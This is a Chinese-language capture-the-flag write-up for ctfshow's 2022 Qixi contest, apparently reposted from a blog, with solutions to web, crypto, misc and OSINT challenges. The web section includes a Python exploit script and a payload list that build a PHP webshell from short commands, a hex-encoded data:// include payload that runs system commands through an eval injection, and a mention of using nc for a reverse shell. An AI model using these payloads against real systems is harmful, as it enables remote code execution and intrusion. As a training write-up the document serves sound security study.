ctfshow七夕杯2022
文章目录
原文
Web
web签到
固定长度RCE,限定7位数字,直接给出exp
# -*- coding: utf-8 -*-# @Time : 2022/8/4 22:03# @Author : pysnow# !/usr/bin/python# -*- coding: UTF-8 -*-import timeimport requestsurl = "http://4432ad06-416e-4375-9e8a-e8499e9bb8cb.challenge.ctf.show/api/tools.php"print("[+]start attack!!!")with open("payload.txt", "r") as f: for i in f: print("[*]" + url.format(i.strip())) data = {"cmd": i.strip()} res = requests.post(url, data=data) time.sleep(3) print(res.text)test = requests.get("http://172d5c73-1dfe-4f7c-b39e-599a19aba8df.challenge.ctf.show/api/1.php")if test.status_code == requests.codes.ok: print("[*]Attack success!!!")>hp>1.p\\>d\>\\>\ -\\>e64\\>bas\\>7\|\\>XSk\\>Fsx\\>dFV\\>kX0\\>bCg\\>XZh\\>AgZ\\>waH\\>PD9\\>o\ \\>ech\\ls -t>0sh 0因为网络问题,每一条命令执行的时间都相近,所以要加一个延时,堵塞一下,保证文件名的顺序正确
然后访问1.php,RCE就行
easy_calc
源码
<?phpif(check($code)){ eval('$result='."$code".";"); echo($result); }function check(&$code){ $num1=$_POST['num1']; $symbol=$_POST['symbol']; $num2=$_POST['num2']; if(!isset($num1) || !isset($num2) || !isset($symbol) ){ return false; } if(preg_match("/!|@|#|\\$|\%|\^|\&|\(|_|=|{|'|<|>|\?|\?|\||`|~|\[/", $num1.$num2.$symbol)){ return false; } if(preg_match("/^[\+\-\*\/]$/", $symbol)){ $code = "$num1$symbol$num2"; return true; } return false;}一个传三个参数,其中两个数字,一个符号,分号这些没过滤,可以执行多个命令,所以寻找最容易绕过的地方,也就是num12
/!|@|#|\\$|\%|\^|\&|\(|_|=|{|'|<|>|\?|\?|\||`|~|\[/过滤了很多符号,最重要的用来执行函数的括号也给过滤了,但是有个东西执行是不需要括号的,那就是文件包含
include "1.php" == include("1.php");include "data://text/plain," == phpinfo();这里data内容可以使用hex编码绕过,即最终payload如下
num1=include "\x64\x61\x74\x61\x3a\x2f\x2f\x74\x65\x78\x74\x2f\x70\x6c\x61\x69\x6e\x2c\x3c\x3f\x70\x68\x70\x20\x73\x79\x73\x74\x65\x6d\x28\x27\x63\x61\x74\x20\x2f\x73\x65\x63\x72\x65\x74\x27\x29\x3b\x3f\x3e";&symbol=%2D&num2=1
flag在/secret
easy_cmd
源码
error_reporting(0);highlight_file(__FILE__);$cmd=$_POST['cmd'];if(preg_match("/^\b(ping|ls|nc|ifconfig)\b/",$cmd)){ exec(escapeshellcmd($cmd));}?>白名单,只给了ping ls ifconfig nc四个命令,由于这道题出网,所以可以直接用nc反弹shell
Crypto
密码签到
** 密文:y3rmc2hvd3tjcnlwdg9fc2lnbmlux2lzx2vhc3l9-a0004008a0**
描述:大牛在今年的hvv过程中,渗透进某业务系统,发现了密文,可是不知道如何解出明文,你能帮他找出来吗? 已知密文由两部分组成,后面的推测为秘钥
base64解一下,然后直接因为解出来的结果比较特殊,可以直接通过句意猜测出flag
ctfshow{crypto_signin_is_easy}
Misc
杂项签到
010打开,在文件结尾出有flag
Osint
社工签到
给了一张图,要求找到图中所在的位置,通过观察图片可以发现这是一个微博博主发的
本来做题的时候是直接找到了跟这个原图很相似的博文,结果后面补wp的时候又找不到了,所以直接百度识图吧
天涯镇 or 天涯小镇
迷失的大象
百度识图一把梭
ctfshow{墨江哈尼族自治县}
大飞机
同样是百度识图,找到一个贴吧
因为航班太久远了,所以搜索不到航班,尝试搜索另外一张图片找到了下面这篇知乎匿名回答,用的是原图,其中的评论区答案就是航班号
ctfshow{CA981}
来源地址:https://blog.csdn.net/not_code_god/article/details/126199298
免责声明:
① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。
② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
